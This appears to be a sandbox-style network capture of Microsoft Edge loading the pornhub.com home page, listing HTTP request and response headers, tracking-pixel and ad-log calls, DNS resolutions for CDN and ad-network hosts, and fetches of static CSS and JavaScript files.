https://www.pornhub.com/_xa/deep_pixel?info=CiQwYWY2ZWY2NC1lNTBhLTQ1NjgtYmFiZi00ODU2ZWM4MzgyZDAQkc%2F3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTEgAjAFOAVAtZEXSNnDz%2BADUgEyWNXrqd4DYIe7tYMEciAzNThkNTRlMjU5OTk0YTBjOWE3MWRjMjE2MjJlOGNjOYEB8WjjiLX45D6SAQJHQpoBA0VOR6IBBkxvbmRvbsoBFWNvZ2VudCBjb21tdW5pY2F0aW9uc9IBBHdpZmnaAQd3aW5kb3dz4gEOMTgxLjIxNS4xNzYuODP6AQ4xODEuMjE1LjE3Ni44M4ICB2RlZDc2NTSSAgRlZGdlmgIERUMxTqoCBDEwLjCyAgQ5Mi4w2AKV3YDcB%2BAC6dCynwT6AgExggNfeyJhY3Rvcl9pZCI6bnVsbCwiY29udGVudF90eXBlIjpudWxsLCJ2aWRlb19pZCI6bnVsbCwiaGFzaCI6ImJiMGNjMGJiNTQ5ODZkODJmMWM1NzgzYThiNDc5MDc5In2SAwdkZXNrdG9wmgMCZW6oAwHCAwRob21lmAQB2AQj&noc=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_pixel?info=CiQwYWY2ZWY2NC1lNTBhLTQ1NjgtYmFiZi00ODU2ZWM4MzgyZDAQkc%2F3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTEgAjAFOAVAtZEXSNnDz%2BADUgEyWNXrqd4DYIe7tYMEciAzNThkNTRlMjU5OTk0YTBjOWE3MWRjMjE2MjJlOGNjOYEB8WjjiLX45D6SAQJHQpoBA0VOR6IBBkxvbmRvbsoBFWNvZ2VudCBjb21tdW5pY2F0aW9uc9IBBHdpZmnaAQd3aW5kb3dz4gEOMTgxLjIxNS4xNzYuODP6AQ4xODEuMjE1LjE3Ni44M4ICB2RlZDc2NTSSAgRlZGdlmgIERUMxTqoCBDEwLjCyAgQ5Mi4w2AKV3YDcB%2BAC6dCynwT6AgExggNfeyJhY3Rvcl9pZCI6bnVsbCwiY29udGVudF90eXBlIjpudWxsLCJ2aWRlb19pZCI6bnVsbCwiaGFzaCI6ImJiMGNjMGJiNTQ5ODZkODJmMWM1NzgzYThiNDc5MDc5In2SAwdkZXNrdG9wmgMCZW6oAwHCAwRob21lmAQB2AQj&noc=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_pixel?info=CiRiMGNkZGUxZi0zNWYzLTQ2MzEtYWExMi02ODY4NDU4OTQxNTIQkc%2F3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTIoATCfqYUBOJ%2BphQFIncCd4gNSATJY29aI4ANg1fK3hQRyIDM1OGQ1NGUyNTk5OTRhMGM5YTcxZGMyMTYyMmU4Y2M5gQEdJET5ghYSP5IBAkdCmgEDRU5HogEGTG9uZG9uygEVY29nZW50IGNvbW11bmljYXRpb25z0gEEd2lmadoBB3dpbmRvd3PiAQ4xODEuMjE1LjE3Ni44M%2FoBDjE4MS4yMTUuMTc2LjgzggIHZGVkNzY1NJICBGVkZ2WaAgRFQzFOqgIEMTAuMLICBDkyLjDYArX65%2BgH4AL7xbSvBPoCATGCA197ImFjdG9yX2lkIjpudWxsLCJjb250ZW50X3R5cGUiOm51bGwsInZpZGVvX2lkIjpudWxsLCJoYXNoIjoiYmIwY2MwYmI1NDk4NmQ4MmYxYzU3ODNhOGI0NzkwNzkifZIDB2Rlc2t0b3CaAwJlbsIDBGhvbWWYBAHYBCM%3D&noc=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_pixel?info=CiRiMGNkZGUxZi0zNWYzLTQ2MzEtYWExMi02ODY4NDU4OTQxNTIQkc%2F3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTIoATCfqYUBOJ%2BphQFIncCd4gNSATJY29aI4ANg1fK3hQRyIDM1OGQ1NGUyNTk5OTRhMGM5YTcxZGMyMTYyMmU4Y2M5gQEdJET5ghYSP5IBAkdCmgEDRU5HogEGTG9uZG9uygEVY29nZW50IGNvbW11bmljYXRpb25z0gEEd2lmadoBB3dpbmRvd3PiAQ4xODEuMjE1LjE3Ni44M%2FoBDjE4MS4yMTUuMTc2LjgzggIHZGVkNzY1NJICBGVkZ2WaAgRFQzFOqgIEMTAuMLICBDkyLjDYArX65%2BgH4AL7xbSvBPoCATGCA197ImFjdG9yX2lkIjpudWxsLCJjb250ZW50X3R5cGUiOm51bGwsInZpZGVvX2lkIjpudWxsLCJoYXNoIjoiYmIwY2MwYmI1NDk4NmQ4MmYxYzU3ODNhOGI0NzkwNzkifZIDB2Rlc2t0b3CaAwJlbsIDBGhvbWWYBAHYBCM%3D&noc=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/fla/log?action=ad_view&ad_id=1085143381&campaign_id=1011310621&initial_zone_id=2184351&member_id=1006775131&zone_id=2184351

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/fla/log?action=ad_view&ad_id=1085143381&campaign_id=1011310621&initial_zone_id=2184351&member_id=1006775131&zone_id=2184351 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: nginx
date: Sat, 01 Feb 2025 09:21:23 GMT
content-length: 0
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/service-worker.js

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /service-worker.js HTTP/2.0
host: www.pornhub.com
cache-control: max-age=0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
service-worker: script
sec-fetch-site: same-origin
sec-fetch-mode: same-origin
sec-fetch-dest: serviceworker
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=285997765363897800
cookie: comp_detect-cookies=41809.100000
cookie: __s=679DE791-42FE722901BB3525F4-BB55572
cookie: __l=679DE791-42FE722901BB3525F4-BB55572
cookie: cookieConsent=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 683
last-modified: Fri, 31 Jan 2025 20:38:05 GMT
etag: "679d34ad-2ab"
x-frame-options: SAMEORIGIN
expires: Sun, 01 Jun 2025 09:21:24 GMT
cache-control: max-age=10368000
pragma: public
cache-control: public
accept-ranges: bytes
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
DNS

static.trafficjunky.com

msedge.exe

Remote address:

8.8.8.8:53

Request

static.trafficjunky.com

IN A

Response

static.trafficjunky.com

IN CNAME

static.trafficjunky.com.sds.rncdn7.com

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.19

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.21

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.16

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.18

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.23

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.22

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.20

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.17
DNS

ei.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ei.phncdn.com

IN A

Response

ei.phncdn.com

IN CNAME

ei.phncdn.com.sds.rncdn7.com

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.21

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.17

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.22

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.16

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.23

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.18

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.19

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.20
GET

https://static.trafficjunky.com/invocation/embeddedads/production/embeddedads.es6.min.js

msedge.exe

Remote address:

64.210.156.19:443

Request

GET /invocation/embeddedads/production/embeddedads.es6.min.js HTTP/2.0
host: static.trafficjunky.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Mon, 20 Jan 2025 16:43:32 GMT
etag: W/"82171bb5b-174c4-62c25f5f2b500"
expires: Wed, 21 May 2025 19:01:08 GMT
cache-control: max-age=1747854068
content-encoding: br
x-cdn-diag: lon1-16009-1-3223444-h-0-0---;16009-27-3492589----0-0-1
GET

https://static.trafficjunky.com/ab/ads_test.js

msedge.exe

Remote address:

64.210.156.19:443

Request

GET /ab/ads_test.js HTTP/2.0
host: static.trafficjunky.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Wed, 26 Jul 2023 19:30:36 GMT
etag: W/"6bb93e32b-7e3-60168e1c0cf00"
expires: Mon, 11 Nov 2024 20:39:03 GMT
cache-control: max-age=21600
content-encoding: br
x-cdn-diag: lon1-16009-3-3223547-h-0-0---;16009-27-3492589----0-0-0
GET

https://static.trafficjunky.com/invocation/popunder/production/popunder.min.js

msedge.exe

Remote address:

64.210.156.19:443

Request

GET /invocation/popunder/production/popunder.min.js HTTP/2.0
host: static.trafficjunky.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:22 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Tue, 17 Dec 2024 19:55:12 GMT
etag: W/"2e4fe4eef-7487-6297caccc0800"
expires: Sun, 20 Apr 2025 12:31:00 GMT
cache-control: max-age=1745152260
content-encoding: br
x-cdn-diag: lon1-16009-3-3223550-h-0-0---;16009-43-3492589----0-0-0
GET

https://ei.phncdn.com/www-static/css/ph-icons.css?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/ph-icons.css?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: text/css
content-length: 2636
last-modified: Thu, 30 Jan 2025 13:39:32 GMT
etag: "679b8114-a4c"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16009-1-3223445-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/css/global-backgrounds.css?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/global-backgrounds.css?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: text/css
content-length: 1931
last-modified: Thu, 30 Jan 2025 13:39:32 GMT
etag: "679b8114-78b"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16009-3-3223547-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/css/generated-header.css?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/generated-header.css?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: text/css
content-length: 7229
last-modified: Thu, 30 Jan 2025 13:39:32 GMT
etag: "679b8114-1c3d"
content-encoding: br
expires: Fri, 30 May 2025 13:44:48 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-3-3264621-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/css/front-index-pc.css?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/front-index-pc.css?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: text/css
content-length: 68729
last-modified: Thu, 30 Jan 2025 13:39:32 GMT
etag: "679b8114-10c79"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-1-3021617-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/css/flags/round_flag.css?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/flags/round_flag.css?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: text/css
content-length: 2065
last-modified: Thu, 30 Jan 2025 13:39:32 GMT
etag: "679b8114-811"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-1-3021608-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/interval-helper.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/interval-helper.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/javascript
content-length: 3937
last-modified: Wed, 20 Nov 2024 17:56:37 GMT
etag: "673e22d5-f61"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-2-3264582-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/utils/mg_utils-1.0.0.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/utils/mg_utils-1.0.0.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/javascript
content-length: 506
last-modified: Mon, 18 Nov 2024 20:24:14 GMT
etag: "673ba26e-1fa"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-3-3264624-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/cookieBanner/cookie_banner.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/cookieBanner/cookie_banner.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/javascript
content-length: 9146
last-modified: Thu, 14 Nov 2024 14:46:54 GMT
etag: "67360d5e-23ba"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-3-3264621-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/ph-functions.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/ph-functions.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:21 GMT
content-type: application/javascript
content-length: 6964
last-modified: Thu, 30 Jan 2025 13:39:33 GMT
etag: "679b8115-1b34"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-3021710-h-0-0---;16007-27-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/mg_modal-1.0.0.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/mg_modal-1.0.0.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:22 GMT
content-type: application/javascript
content-length: 1263
last-modified: Mon, 28 Oct 2024 21:01:19 GMT
etag: "671ffb9f-4ef"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16009-3-3223547-h-0-0---;16007-29-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/images/pornhub_logo_straight.svg?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/images/pornhub_logo_straight.svg?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
